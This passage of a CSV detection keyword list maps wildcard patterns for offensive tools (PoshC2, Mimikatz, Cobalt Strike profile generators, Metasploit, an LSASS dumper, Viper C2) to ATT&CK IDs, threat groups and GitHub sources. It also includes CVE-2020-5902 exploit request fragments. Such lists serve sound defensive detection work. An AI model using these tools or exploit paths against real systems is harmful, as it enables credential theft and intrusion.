lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*PoshC2-*.zip*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - 
T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2.server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2.service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2-ansible-main.yml*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. 
post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-cookie-decryptor*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-delete *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - 
T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshkatz.psd1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Stealthbits/poshkatz","1","1","N/A","10","3","210","33","2019-12-28T15:53:40Z","2018-10-29T16:07:40Z" +"*posh-project *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-project 
-*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-server -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-server -*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 
framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-update *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*POST */tmui/login.jsp/.. 
/tmui/locallb/workspace/fileSave.jsp*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*POST *fileName=/tmp/1.txt&content=CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*post/windows/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*post_breach_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*post_ex_amsi_disable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" 
+"*post_ex_keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Post_EX_Process_Name*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*post_ex_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 
- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_spawnto_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 
- LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_spawnto_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*POST_EXPLOIT_DIR*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*post_exploitation.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*PostDump.exe *","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*POSTDump-main*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*postgres_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*postgres_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*PostMulitDomainSpider.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*PostMulitMsfGetDomainInfoByBloodHound.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*PostPowershellPowerViewAddNetUser.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*PostPowershellPowerViewGetNetGroup.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*PostPowershellPowerViewGetNetGroupMember.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*PostPowershellPowerViewGetNetProcess.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
